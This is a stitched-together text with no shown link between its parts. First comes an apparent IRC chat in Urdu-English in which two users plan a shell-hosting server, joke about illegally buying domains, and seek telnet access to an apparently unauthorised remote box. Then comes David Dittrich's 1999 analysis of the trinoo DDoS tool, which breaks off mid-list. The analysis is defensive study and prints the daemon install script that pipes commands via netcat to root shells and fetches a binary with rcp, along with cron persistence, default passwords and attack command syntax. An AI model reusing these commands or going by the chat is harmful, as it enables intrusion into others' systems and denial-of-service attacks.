:hah is say kuch nahi hotha waisy bee almost sub shells kay milthay julthay hain :D1ck! :EMAIL HOSTING :D1ck! : FREE Domain Name Registration (Internic Fee applies) :D1ck! : username@your-company.com :D1ck! : 5 Mailboxes (POP3) :D1ck! : 25 Emails Forwarding :D1ck! : 3 months [$30] - 6 months [$50] - 12 months [$75] :D1ck! :lol :D1ck! :yup :D1ck! ::P :D1ck! :oye when will it be complete :D1ck! :asnd i am signing up legal domain :D1ck! :where should i? :D1ck! :cheapest :D1ck! :? :J4n3! :hmmm :D1ck! :mater may we are OC3 :P :J4n3! :dotster.com :D1ck! :OC3 lines :D1ck! :ok :J4n3! :yeah from where u getting this server ? and till when u get it ? :J4n3! :it should be on redhat ok ? :D1ck! :easilyhosted :D1ck! :yep :D1ck! :it is :D1ck! :i`ll make it ultra secure :D1ck! :redhat 6.2 :J4n3! :haha kewl :D1ck! :i`ll upgrade to new kernel :J4n3! :give me 2 days for web :D1ck! :2.2.16 :D1ck! :kewl :D1ck! :okies :J4n3! ::) :D1ck! :the day u do it :D1ck! :the next day ill get the seerver :D1ck! :online :J4n3! :hmmm :J4n3! :talked to ur dad bout it ? :D1ck! :ofcourse :D1ck! :he sed 'yes' :D1ck! :and i have his cc in my hand :D1ck! ::P :J4n3! :haha cool :J4n3! :woooo :J4n3! ::p :D1ck! ::/ :J4n3! :lekin signup kahan say kiya ?? konsee company say ? :J4n3! :t3 ? :J4n3! :or oc3 ? :D1ck! :well :D1ck! :more then Tota1KaaS1 :D1ck! :t1 :D1ck! :but :D1ck! :technically OC3 :D1ck! :ll providers who sya they are oc3 are lieing, yes technicqally they :D1ck! :are :J4n3! :ahaan :D1ck! :but its shared bandwith :D1ck! :mine will be 990k/sec :J4n3! :w00ps :D1ck! :to 2 mb :D1ck! :and 40 gigs of transfer :J4n3! :shells will rock on this server :D1ck! :yep :D1ck! ::) :D1ck! :and i`ve heard routers are firewalled :D1ck! :so thats a good enws :J4n3! :great already signed up , or going to ? :D1ck! :oye pls get started on the page if u are not too bz :D1ck! ::P :D1ck! :i will send the payment :J4n3! :yeah i will from today :D1ck! :no cc :D1ck! :and today i`ll buy a merchant account :J4n3! :oh ohkay :) :D1ck! ::) :J4n3! :u have too many ips :D1ck! :yep :J4n3! :we can buy more domains illlegaly to like j0e but :D1ck! :that rox :D1ck! :well :D1ck! :i can get caught :J4n3! :first we need the dns of ur server so we can give it when registering the domain :D1ck! ::p :J4n3! :like ns1 and ns2 :J4n3! :they need it for registeration :D1ck! :oh :D1ck! :i am half way through the registration :D1ck! :hehe :D1ck! :so i cant modify it later? :J4n3! :yeah :) :D1ck! :kewl :D1ck! :almost complete :J4n3! ::)))))) :D1ck! :hehe :D1ck! :a graphix of Big Tecnologies would rock :J4n3! :sure it would , just see :D1ck! ::/ :D1ck! :oki :J4n3! ::9:0:) :D1ck! ::) :J4n3! :how do i open a telnet on a box ?? from inetd.conf ? when it say connection refused on 23 , its not on hosts.allow :D1ck! :err they need name serfver :D1ck! :hehe :D1ck! :cat /etc/inetd.conf | grep telnet :D1ck! :and paste me here :J4n3! :yeah wait :J4n3! :hahah yeah :J4n3! :its close from there :J4n3! :the box is kewl i want to run psy from there :J4n3! :ip is admin.cgocable.net :J4n3! :wait lemme opne it :D1ck! :hehhe Day 14 June 17 307.0 [IND] Trinoo DDoS Analysis ~~~~~~~~~~~~~~~~~~~~~~~~~~~ ========================================================================== The DoS Project's "trinoo" distributed denial of service attack tool ========================================================================== David Dittrich University of Washington Copyright 1999. All rights reserved. October 21, 1999 Introduction ------------ The following is an analysis of the DoS Project's "trinoo" (a.k.a. "trin00") master/slave programs, which implement a distributed network denial of service tool. Trinoo daemons were originally found in binary form on a number of Solaris 2.x systems, which were identified as having been compromised by exploitation of buffer overrun bugs in the RPC services "statd", "cmsd" and "ttdbserverd". These attacks are described in CERT Incident Note 99-04: http://www.cert.org/incident_notes/IN-99-04.html The trinoo daemons were originally believed to be UDP based, access-restricted remote command shells, possibly used in conjunction with sniffers to automate recovering sniffer logs. During investigation of these intrusions, the installation of a trinoo network was caught in the act and the trinoo source code was obtained from the account used to cache the intruders' tools and log files. This analysis was done using this recovered source code. Modification of the source code would change any of the details in this analysis, such as prompts, passwords, commands, TCP/UDP port numbers, or supported attack methods, signatures, and features. The daemon was compiled and run on Solaris 2.5.1 and Red Hat Linux 6.0 systems. The master was compiled and run on Red Hat Linux 6.0. It is believed that both master and daemon have been witnessed "in the wild" on these same platforms. Trinoo networks are probably being set up on hundreds, perhaps thousands, of systems on the Internet that are being compromised by remote buffer overrun exploitation. Access to these systems is probably being perpetuated by the installation of multiple "back doors" along with the trinoo daemons. A trinoo network of at least 227 systems -- 114 of these at Internet2 sites -- was used on August 17, 1999 to flood a single system at the University of Minnessota, swamping the target network and rendering it unusable for over two days. While responding to this attack, large flows were also noticed going to at least sixteen other systems, some outside the US. (See Appendix D for a report of part of this trinoo attack.) Attack scenario --------------- A typical installation might go something like this. 1). A stolen account is set up as a repository for pre-compiled versions of scanning tools, attack (i.e. buffer overrun exploit) tools, root kits and sniffers, trinoo daemon and master programs, lists of vulnerable hosts and previously compromised hosts, etc. This would normally be a large system with many users, one with little administrative oversight, and on a high-bandwidth connection for rapid file transfer. 2). A scan is performed of large ranges of network blocks to identify potential targets. Targets would include systems running various services known to have remotely exploitable buffer overflow security bugs, such as wu-ftpd, RPC services for "cmsd", "statd", "ttdbserverd", "amd", etc. Operating systems being targeted appear to be primarily Sun Solaris 2.x and Linux (due to the ready availability of network sniffers and "root kits" for concealing back doors, etc.), but stolen accounts on any architecture can be used for caching tools and log files. 3). A list of vulnerable systems is then used to create a script that performs the exploit, sets up a command shell running under the root account that listens on a TCP port (commonly 1524/tcp, the "ingreslock" service port), and connects to this port to confirm the success of the exploit. In some cases, an electronic mail message is sent to an account at a free web based email service to confirm which systems have been compromised. The result is a list of "owned" systems ready for setting up back doors, sniffers, or the trinoo daemons or masters. 4). From this list of compromised systems, subsets with the desired architecture are chosen for the trinoo network. Pre-compiled binaries of the trinoo daemon are created and stored on a stolen account somewhere on the Internet. 5). A script is then run which takes this list of "owned" systems and produces yet another script to automate the installation process, running each installation in the background for maximum multitasking. This script uses "netcat" ("nc") to pipe a shell script to the root shell listening on, in this case, port 1524/tcp: --------------------------------------------------------------------------- ./trin.sh | nc 128.aaa.167.217 1524 & ./trin.sh | nc 128.aaa.167.218 1524 & ./trin.sh | nc 128.aaa.167.219 1524 & ./trin.sh | nc 128.aaa.187.38 1524 & ./trin.sh | nc 128.bbb.2.80 1524 & ./trin.sh | nc 128.bbb.2.81 1524 & ./trin.sh | nc 128.bbb.2.238 1524 & ./trin.sh | nc 128.ccc.12.22 1524 & ./trin.sh | nc 128.ccc.12.50 1524 & . . . --------------------------------------------------------------------------- The script "trin.sh", whose output is being piped to these systems, looks like: --------------------------------------------------------------------------- echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen" echo "echo rcp is done moving binary" echo "chmod +x /usr/sbin/rpc.listen" echo "echo launching trinoo" echo "/usr/sbin/rpc.listen" echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron" echo "crontab cron" echo "echo launched" echo "exit" --------------------------------------------------------------------------- Depending on how closely crontab files are monitored, or if they are used at all, this may be detected easily. If cron is not used at all by this user (usually root), it may not be detected at all. Another method was witnessed on at least one other system, where the daemon was named "xterm", and was started using a script (named "c" on the system on which it was found) that contains: --------------------------------------------------------------------------- cd /var/adm/.1 PATH=.:$PATH export PATH xterm 1>/dev/null 2>&1 --------------------------------------------------------------------------- This would supposedly imply a method of running this script on demand to set up the trinoo network. Even more subtle ways of having trinoo daemons/masters lie in wait for execution at a given time are easy to envision (e.g., UDP or ICMP based client/server shells, such as LOKI (see Appendix C) , programs that wake up periodically and open a listening TCP or UDP port, etc.) The result of this automation is the ability for attackers to set up the denial of service network, on widely dispersed systems whose true owners don't even know are out of their control, in a very short time frame. 6). Optionally, a "root kit" is installed on the system to hide the presence of programs, files, and network connections. This is more important on the master system, since these systems are key to the trinoo network. (It should be noted that in many cases, masters have been set up on Internet Service Providers' primary name server hosts, which would normally have extremely high packet traffic and large numbers of TCP and UDP connections, which would effectively hide any trinoo related traffic or activity, and would likely not be detected. (The fact that these are primary name servers would also tend to make the owners less likely to take the system off the Internet when reports begin to come in about suspected denial of service related activity.) Root kits would also be used on systems running sniffers that, along with programs like "hunt" (TCP/IP session hijacking tool) are used to burrow further into other networks directly, rather than through remote buffer overrun exploits (e.g., to find sites to set up new file repositories, etc.) For more on "root kits" and some ways to get around them, see: http://staff.washington.edu/dittrich/misc/faqs/rootkits.faq The network: attacker(s)-->master(s)-->daemon(s)-->victim(s) ------------------------------------------------------------ The trinoo network is made up of a master server ("master.c") and the trinoo daemon ("ns.c"). A trinoo network would look like this: +----------+ +----------+ | attacker | | attacker | +----------+ +----------+ | | . . . --+------+---------------+------+----------------+-- . . . | | | | | | +----------+ +----------+ +----------+ | master | | master | | master | +----------+ +----------+ +----------+ | | | | | | . . . ---+------+-----+------------+---+--------+------------+-+-- . . . | | | | | | | | | | +--------+ +--------+ +--------+ +--------+ +--------+ | daemon | | daemon | | daemon | | daemon | | daemon | +--------+ +--------+ +--------+ +--------+ +--------+ The attacker(s) control one or more "master" servers, each of which can control many "daemons" (known in the code as "Bcast", or "broadcast" hosts.) The daemons are all instructed to coordinate a packet based attack against one or more victim systems. All that is then needed is the ability to establish a TCP connection to the master hosts using "telnet" and the password to the master server to be able to wage massive, coordinated, denial of service attacks. Communication ports ------------------- Attacker to Master(s): 27665/tcp Master to daemon(s): 27444/udp Daemon to Master(s): 31335/udp Remote control of the trinoo master is accomplished via a TCP connection to port 27665/tcp. After connecting, the user must give the proper password ("betaalmostdone"). If another connection is made to the server while someone is already authenticated, a warning is sent to them with the IP address of the connecting host (it appears there is a bug that reports incorrect IP addresses, but a warning is still communicated). This will no doubt be fixed eventually and will then give the attackers time to clean up and cover their tracks. Communication from the trinoo master to daemons is via UDP packets on port 27444/udp. Command lines are space separated lines of the form: arg1 password arg2 The default password for commands is "l44adsl", and only command lines that contain the substring "l44" are processed. Communication from the trinoo daemons and the master is via UDP packets on port 31335/udp. When the daemon starts, it initially sends "*HELLO*" to the master, which maintains a list of active daemons that it controls (packet captured using "sniffit"): UDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32876-10.0.0.1.31335 45 E 00 . 00 . 23 # B1 . 5D ] 40 @ 00 . F8 . 11 . B9 . 27 . C0 . A8 . 00 . 01 . 0A . 00 . 00 . 01 . 80 . 6C l 7A z 67 g 00 . 0F . 06 . D4 . 2A * 48 H 45 E 4C L 4C L 4F O 2A * If the trinoo master sends a "png" command to a daemon on port 27444/udp, the daemon will reply to the server that just sent the "png" command by sending the string "PONG" on port 31335/udp: UDP Packet ID (from_IP.port-to_IP.port): 10.0.0.1.1024-192.168.0.1.27444 45 E 00 . 00 . 27 ' 1A . AE . 00 . 00 . 40 @ 11 . 47 G D4 . 0A . 00 . 00 . 01 . C0 . A8 . 00 . 01 . 04 . 00 . 6B k 34 4 00 . 13 . 2F / B7 . 70 p 6E n 67 g 20 6C l 34 4 34 4 61 a 64 d 73 s 6C l UDP Packet ID (from_IP.port-to_IP.port): 192.168.0.1.32879-10.0.0.1.31335 45 E 00 . 00 . 20 13 . 81 . 40 @ 00 . F8 . 11 . 57 W 07 . C0 . A8 . 00 . 01 . 0A . 00 . 00 . 01 . 80 . 6F o 7A z 67 g 00 . 0C . 4E N 24 $ 50 P 4F O 4E N 47 G Password protection ------------------- Both the master and daemons are password protected to prevent system administrators (or other hacker groups) from being able to take control of the trinoo network. These passwords are crypt() style passwords. They are used in a symmetric fashion, where the encrypted password is compiled into the master and daemons and used to compare against the clear-text version of the password that is sent over the network (the current version does not encrypt the actual session, so the clear-text passwords are exposed in transit and the master control sessions are subject to TCP session highjacking). When initially run, the master daemon produces a prompt, waiting for a password. If the proper password is not received, the program exits. If the proper password is given, the process announces its execution, forks to continue running in the background, and exits: # ./master ?? wrongpassword # . . . # ./master ?? gOrave trinoo v1.07d2+f3+c [Sep 26 1999:10:09:24] # Likewise, when you connect to the remote command port (default 27665/tcp), you must also give a password: attacker$ telnet 10.0.0.1 27665 Trying 10.0.0.1 Connected to 10.0.0.1 Escape character is '^]'. kwijibo Connection closed by foreign host. . . . attacker$ telnet 10.0.0.1 27665 Trying 10.0.0.1 Connected to 10.0.0.1 Escape character is '^]'. betaalmostdone trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/] trinoo> Certain commands sent to the trinoo daemons by the master are also password protected. This password is sent in clear text between the master and daemons. The default passwords were: "l44adsl" trinoo daemon password "gOrave" trinoo master server startup ("?? " prompt) "betaalmostdone" trinoo master remote interface password "killme" trinoo master password to control "mdie" command Master commands --------------- The trinoo master supports the following commands: die Shut down the master. quit Log off the master. mtimer N Set DoS timer to N seconds. N can be between 1 and 1999 seconds. If N is < 1, it defaults to 300. If N is > 2000, it defaults to 500. dos IP DoS the IP address specified. A command ("aaa l44adsl IP") is sent to each Bcast host (i.e., trinoo daemons) telling them to DoS the specified IP address. mdie pass Disable all Bcast hosts, if the correct password is specified. A command is sent ("d1e l44adsl") to each Bcast host telling them to shut down. A separate password is required for this command. mping Send a PING command ("png l44adsl") to every active Bcast host. mdos Multiple DoS. Sends a multiple DoS command ("xyz l44adsl 123:ip1:ip2:ip3") to each Bcast host. info Print version and compile information, e.g.: This is the "trinoo" AKA DoS Project master server version v1.07d2+f3+c Compiled 15:08:41 Aug 16 1999 msize Set the buffer size for packets sent during DoS attacks. nslookup host Do a name service lookup of the specified host from the perspective of the host on which the master server is running. killdead Attempts to weed out all dead Bcast hosts by first sending all known Bcast hosts a command ("shi l44adsl") that causes any active daemons to reply with the initial "*HELLO*" string, then renames the Bcast file (with extension "-b") so it will be re-initialized when the "*HELLO*" packets are received. usebackup Switch to the backup Bcast file created by the "killdead" command. bcast List all active Bcast hosts. help [cmd] Give a (partial) list of commands, or a brief description of the command "cmd" if specified. mstop Attempts to stop a DoS attack (not implemented, but listed in the help command). Daemon commands --------------- The trinoo daemon supports the following commands: aaa pass IP DoS the specified IP address. Sends UDP packets to random (0-65534) UDP ports on the specified IP addresses for a period of time (default is 120 seconds, or 1 - 1999 seconds as set by the "bbb" command.) The size of the packets is that set by the "rsz" command, or the default size of 1000 bytes. bbb pass N Sets time limit (in seconds) for DoS attacks. shi pass Sends the string "*HELLO*" to the list of master servers compiled into the program on port 31335/udp. png pass Sends the string "PONG" to the master that issued the the command on port 31335/udp. d1e pass Shut down the trinoo daemon. rsz N Set size of buffer for DoS attacks to N bytes. (The trinoo daemon simply malloc()s a buffer with this size, then sends the uninitialized contents of the buffer during an attack.) xyz pass 123:ip1:ip2:ip3 Multiple DoS. Does the same thing as the "aaa" command, but for multiple IP addresses. It could be coincidence, but I will give the author some credit and assume that three letter commands were chosen so they don't show up in the binary as visible strings under the default behavior of STRINGS(1). You must use the "--bytes=3" option of GNU STRINGS(1) to see the commands: # strings --bytes=3 ns | tail -15 socket bind recvfrom l44 %s %s %s aIf3YWfOhw.V. aaa bbb shi png PONG d1e rsz xyz *HELLO* Fingerprints ------------ The method used to install the trinoo daemon on some systems employs a crontab entry to start the daemon every minute. Examining crontab files would locate this entry: * * * * * /usr/sbin/rpc.listen The master program creates a file (default name "...") containing the set of Bcast hosts. If the command "killdead" is used, an "shi" command is sent to all daemons listed in "...", which causes them to send the initial "*HELLO*" string to all masters. The current list is renamed (default "...-b") and a new list is then generated as each remaining live daemon sends its "*HELLO*". The source code ("master.c") contains the following lines: ------------------------------------------------------------------------------ . . . /* crypt key encrypted with the key 'bored'(so hex edit cannot get key easily?) comment out for no encryption... */ #define CRYPTKEY "ZsoTN.cq4X31" . . . ------------------------------------------------------------------------------ If the program was compiled with CRYPTKEY defined, the IP addresses of Bcast hosts are encrypted using the Blowfish encryption algorithm: # ls -l ... ...-b -rw------- 1 root root 25 Sep 26 14:46 ... -rw------- 1 root root 50 Sep 26 14:30 ...-b # cat ... JPbUc05Swk/0gMvui18BrFH/ # cat ...-b aE5sK0PIFws0Y0EhH02fLVK. JPbUc05Swk/0gMvui18BrFH/ Assuming there is no "root kit" present to hide processes, the master server shows the following network socket fingerprints (of course, the names and directory locations of either program are subject to change): ------------------------------------------------------------------------------ # netstat -a --inet Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:27665 *:* LISTEN . . . udp 0 0 *:31335 *:* . . . # lsof | egrep ":31335|:27665" master 1292 root 3u inet 2460 UDP *:31335 master 1292 root 4u inet 2461 TCP *:27665 (LISTEN) # lsof -p 1292 COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME master 1292 root cwd DIR 3,1 1024 14356 /tmp/... master 1292 root rtd DIR 3,1 1024 2 / master 1292 root txt REG 3,1 30492 14357 /tmp/.../master master 1292 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so master 1292 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so master 1292 root mem REG 3,1 4016683 29115 /lib/libc-2.1.1.so master 1292 root 0u CHR 4,1 2967 /dev/tty1 master 1292 root 1u CHR 4,1 2967 /dev/tty1 master 1292 root 2u CHR 4,1 2967 /dev/tty1 master 1292 root 3u inet 2534 UDP *:31335 master 1292 root 4u inet 2535 TCP *:27665 (LISTEN) ------------------------------------------------------------------------------ A system running a daemon would show the following: ------------------------------------------------------------------------------ # netstat -a --inet Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State . . . udp 0 0 *:1024 *:* udp 0 0 *:27444 *:* . . . # lsof | egrep ":27444" ns 1316 root 3u inet 2502 UDP *:27444 # lsof -p 1316 COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME ns 1316 root cwd DIR 3,1 1024 153694 /tmp/... ns 1316 root rtd DIR 3,1 1024 2 / ns 1316 root txt REG 3,1 6156 153711 /tmp/.../ns ns 1316 root mem REG 3,1 342206 28976 /lib/ld-2.1.1.so ns 1316 root mem REG 3,1 63878 29116 /lib/libcrypt-2.1.1.so ns 1316 root mem REG 3,1 4016683 29115 /lib/libc-2.1.1.so ns 1316 root 0u CHR 4,1 2967 /dev/tty1 ns 1316 root 1u CHR 4,1 2967 /dev/tty1 ns 1316 root 2u CHR 4,1 2967 /dev/tty1 ns 1316 root 3u inet 2502 UDP *:27444 ns 1316 root 4u inet 2503 UDP *:1024 ------------------------------------------------------------------------------ Defenses -------- Of course, the best defense is to prevent intrusions and root level compromise of your systems in the first place, so there would be no systems on which to install trinoo master/daemons. In an ideal world, all systems would be patched, secured, monitored, intrusion detection systems and firewalls would be available to detect and reject packets, and I'd be a multi-millionaire living six months of the year in a beach mansion on Bali, and six months in the French Alps. In the real world, this is not an option (at least not in the foreseeable future.) Instead, your network may already have several trinoo daemons running and ready to DoS other systems at any minute. So how can they be detected or disabled? Because the programs use high numbered UDP ports for both communication and attack, it will be very difficult (if not impossible) to block it without breaking programs that use UDP on high numbered ports. The easiest method to detect the presence of trinoo masters or daemons (as the code exists presently) may be to monitor all UDP packets on shared Ethernet segments and look for the tell tale signs of communication between master(s) and daemon(s) as described elsewhere in this paper. (Switches would preclude seeing UDP packets that are not associated with the MAC address of the monitoring host's network interface.) Unfortunately, this would only occur during an attack, which would likely become known by network throughput degradation and/or reports of denial of service attacks from victim sites. If a system is suspected of hosting a trinoo daemon that is actively attacking, the output of the Solaris "truss" program on the running daemon will show output like the following: ------------------------------------------------------------------------------ . . . getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) = 0 getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) (sleeping...) getmsg(3, 0xEFFFF830, 0xEFFFF83C, 0xEFFFF81C) = 0 time() = 938385467 open("/dev/udp", O_RDWR) = 5 ioctl(5, I_PUSH, "sockmod") = 0 ioctl(5, I_STR, 0xEFFFF748) = 0 ioctl(5, I_SETCLTIME, 0xEFFFF7FC) = 0 ioctl(5, I_SWROPT, 0x00000002) = 0 sigprocmask(SIG_SETMASK, 0xEFFFF7EC, 0xEFFFF7DC) = 0 ioctl(5, I_STR, 0xEFFFF660) = 0 sigprocmask(SIG_SETMASK, 0xEFFFF7DC, 0xEFFFF7B8) = 0 sigprocmask(SIG_BLOCK, 0xEFFFF548, 0xEFFFF5C0) = 0 ioctl(5, I_STR, 0xEFFFF548) = 0 sigprocmask(SIG_SETMASK, 0xEFFFF5C0, 0x00000000) = 0 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 putmsg(5, 0xEFFFF83C, 0xEFFFF7A0, 0) = 0 time() = 938385467 . . . ------------------------------------------------------------------------------ The traffic on the network during an attack against a single target (as seen by "tcpdump") would look like: ------------------------------------------------------------------------------ # tcpdump ip host 192.168.0.1 . . . 15:40:08.491782 10.0.0.1.1024 > 192.168.0.1.27444: udp 25 15:40:08.574453 192.168.0.1.32885 > 216.160.XX.YY.16838: udp 4 (DF) 15:40:08.576427 192.168.0.1.32885 > 216.160.XX.YY.5758: udp 4 (DF) 15:40:08.579752 192.168.0.1.32885 > 216.160.XX.YY.10113: udp 4 (DF) 15:40:08.583056 192.168.0.1.32885 > 216.160.XX.YY.17515: udp 4 (DF) 15:40:08.600948 192.168.0.1.32885 > 216.160.XX.YY.31051: udp 4 (DF) 15:40:08.604943 192.168.0.1.32885 > 216.160.XX.YY.5627: udp 4 (DF) 15:40:08.610886 192.168.0.1.32885 > 216.160.XX.YY.23010: udp 4 (DF) 15:40:08.614202 192.168.0.1.32885 > 216.160.XX.YY.7419: udp 4 (DF) 15:40:08.615507 192.168.0.1.32885 > 216.160.XX.YY.16212: udp 4 (DF) 15:40:08.616854 192.168.0.1.32885 > 216.160.XX.YY.4086: udp 4 (DF) 15:40:08.618827 192.168.0.1.32885 > 216.160.XX.YY.2749: udp 4 (DF) 15:40:08.623480 192.168.0.1.32885 > 216.160.XX.YY.12767: udp 4 (DF) 15:40:08.625458 192.168.0.1.32885 > 216.160.XX.YY.9084: udp 4 (DF) 15:40:08.628764 192.168.0.1.32885 > 216.160.XX.YY.12060: udp 4 (DF) 15:40:08.632090 192.168.0.1.32885 > 216.160.XX.YY.32225: udp 4 (DF) . . . ------------------------------------------------------------------------------ Weaknesses ---------- The first weakness is that the crypt() encrypted passwords, and some prompts and return strings, are visible in both the master and daemon binary images. This can allow you to identify whether you have found a master or a daemon, determine whether the passwords are the defaults shown in this paper or not, and potentially allow you to exploit the password weaknesses to take control of some/all of the trinoo network yourself. If the source code has been modified (which it no doubt will by smarter attackers), you would need to crack the passwords, or use a hexadecimal/ASCII editor (e.g., "xxd", part of the VIM editor suite) and change them in the binary image, in order to, for example, run the master to retrieve the list of daemons. If the source has not, you can determine this fact by observing the strings embedded in the program binary: ------------------------------------------------------------------------------ # strings - ns . . . socket bind recvfrom %s %s %s aIf3YWfOhw.V. <=== crypt() encrypted password "l44adsl" PONG *HELLO* . . . # strings - master . . . ---v v1.07d2+f3+c trinoo %s l44adsl <=== clear text version of daemon password sock 0nm1VNMXqRMyM <=== crypt() encrypted password "gOrave" 10:09:24 Sep 26 1999 trinoo %s [%s:%s] bind read *HELLO* ZsoTN.cq4X31 <=== CRYPTKEY bored NEW Bcast - %s PONG PONG %d Received from %s Warning: Connection from %s beUBZbLtK7kkY <=== crypt() encrypted password "betaalmostdone" trinoo %s..[rpm8d/cb4Sx/] . . . DoS: usage: dos DoS: Packeting %s. aaa %s %s mdie ErDVt6azHrePE <=== crypt() encrypted password for "mdie" command mdie: Disabling Bcasts. d1e %s mdie: password? . . . ------------------------------------------------------------------------------ Next, and more vulnerable, is the daemon password, which travels the network in clear text form. Assuming you know the UDP port on which the master communicates to the client, you can capture the password using "sniffit", "ngrep", "tcpdump", or any network monitoring program capable of showing UDP packet data payloads (see Appendix A for a sample session logged with "ngrep"). For example, here is the "png" command being sent to the trinoo daemon as seen by "sniffit": UDP Packet ID (from_IP.port-to_IP.port): 10.0.0.1.1024-192.168.0.1.27444 45 E 00 . 00 . 27 ' 1A . AE . 00 . 00 . 40 @ 11 . 47 G D4 . 0A . 00 . 00 . 01 . C0 . A8 . 00 . 01 . 04 . 00 . 6B k 34 4 00 . 13 . 2F / B7 . 70 p 6E n 67 g 20 6C l 34 4 34 4 61 a 64 d 73 s 6C l As was mentioned earlier, the "mdie" command in the trinoo master is password protected in the master itself. There are a couple ways to attack this. If you can determine the crypt() encrypted string using the Unix "strings" command, you could (potentially) use a password cracking utility, such as "crack", and break it (see Appendix C). This may take a LONG time if the password was well chosen, but it is feasible (and the "killme" password for the "mdie" command was cracked in less than 30 seconds on a Pentium II). You could try to sniff the password on the wire between the attacker and the master, but presumably this command would not be used by the attackers often, if at all, since they want the daemons to be active when needed for an attack. You may have more luck sniffing the daemon password, since it is required for most commands. This can be done on either the daemon's or master's network (these are usually entirely different networks.) It should be easier to accomplish on the daemon's network since there are far more daemons than masters. Since many of the masters have been found on primary name servers, presumably there would be more traffic on high-numbered UDP ports on networks containing masters than on networks containing daemons (outside of the duration of denial of service attacks, that is.) Furthermore you will likely find several daemons at a given site, possibly as a result of detecting the original system compromise. Once you have located a daemon, you have also found the list of IP addresses of masters (use "strings" to see them.) You should immediately contact these sites and convince them to closely inspect the system for signs of intrusion, with likely "root kit" installations to make this task more difficult, and attempt to coordinate a response. Having found a master, the list of daemons (which will likely include hosts at many other sites) can be obtained by simply identifying the file which contains the list, if unencrypted. If, however, the file is encrypted, you would either have to decrypt the Blowfish encrypted file using the same key compiled into the program, or by taking control of the master and using the "bcast" command. It you have identified an active command session to a master, which is a standard "telnet" style TCP session, you could hijack the session using "hunt" and start executing commands. Not knowing the "mdie" command password, you could not disable all the daemons directly, but you COULD use the "bcast" command and get a list of all of them (you would probably want to do this using the "script" command to generate a transcript of the session, as this could be a very large list). Once you know the addresses of all the daemons, and the daemon password (visible in "strings" output), you could then send the proper command string in UDP packets to any suspected trinoo daemon(s). Creation and transmission of UDP packets can be accomplished with tools like LibNet, Spak, the Perl Net::RawIP library, etc. (A Perl script using Net::RawIP named "trinot" has been developed to accomplish this task. See Appendix B). As the typical installation of the daemon includes a crontab entry that runs it every minute, you would have to constantly spray your entire network to keep the daemons from re-starting. (This may be due to programming bugs that cause the daemons to crash occasionally, or may be to defeat system administrators who simply notice and kill the process, but do not think to check for a crontab entry that re-starts the daemon.) The daemons can also be found on your network by sniffing the data portion of UDP packets for the strings "*HELLO*" and "PONG", or any of the command strings themselves for that matter (until the source is modified to change these strings, of course.) The "ngrep" program works nicely for this: ------------------------------------------------------------------------------ # ngrep -i -x "*hello*|pong" udp interface: eth0 (192.168.0.200/255.255.255.0) filter: ip and ( udp ) match: *hello*|pong . . . # U 192.168.0.1:32887 -> 10.0.0.1:31335 2a 48 45 4c 4c 4f 2a *HELLO* ### U 192.168.0.1:32888 -> 10.0.0.1:31335 50 4f 4e 47 PONG U 192.168.0.3:32815 -> 10.0.0.1:31335 50 4f 4e 47 PONG U 192.168.0.5:32798 -> 10.0.0.1:31335 50 4f 4e 47 PONG . . . ------------------------------------------------------------------------------ While not weaknesses in trinoo itself, there are also weaknesses in the way the trinoo networks are set up. As mentioned earlier, some systems showed crontab entries used to start the daemons once per minute. This leaves an obvious fingerprint on crontab files. The scripts observed to automate the installation of trinoo networks use the Berkeley "rcp" command (use of rcp has also been observed in a file upload capability built into newer versions of the "Tribe Flood Network" daemon program). Monitoring "rcp" connections (514/tcp) from multiple systems on your network, in quick succession, to a single IP address outside your network would be a good trigger. (Note that the use of "rcp" in a script requires an anonymous trust relationship, usually in the form of "+ +" in a user's ~/.rhosts file, which also will allow you to immediately archive the contents of this account while contacting the owners to preserve evidence.) (Further analysis of trinoo by George Weaver of Pennsylvania State University and David Brumley of Stanford niversity is included in Appendix E - Further methods of detecting trinoo. George deserves special credit for attempting to hand-decompile a recovered SPARC binary image! ;) The next logical evolutionary steps ----------------------------------- One of the easiest attacks to implement is the denial of service attack. Many bugs exist in TCP/IP stacks, for example, that allow fragmented packets, large packets, IP options, half-open TCP connections, or floods of packets (highest bandwidth wins) etc., to cause the system performance to be degraded, or actually crash the system. As each bug is found, an exploit program demonstrating the bug is generally produced. Each of these exploit programs is generally unique, exploiting a specific bug that may only affect a single TCP/IP implementation (although with Microsoft having such a large market share of personal computers, and many home users being almost totally unaware of such bugs, let alone where to get and how to apply patches to fix these bugs, the chances are high that a multi-exploit attack will succeed in crashing the target system.) These denial of service exploits are available from numerous sites on the Internet, such as: http://www.technotronic.com/denial.html http://www.rootshell.com/ The next step was to combine multiple denial of service exploits into one tool, using Unix shell scripts. One such tool, named "rape", (according to the code it was written in 1998 by "mars", with modifications by "TheVirus" and further code improvements by "ttol") integrates the following exploits into a single shell script: echo "Editted for use with www.ttol.base.org" echo "rapeing $IP. using weapons:" echo "latierra " echo -n "teardrop v2 " echo -n "newtear " echo -n "boink " echo -n "bonk " echo -n "frag " echo -n "fucked " echo -n "troll icmp " echo -n "troll udp " echo -n "nestea2 " echo -n "fusion2 " echo -n "peace 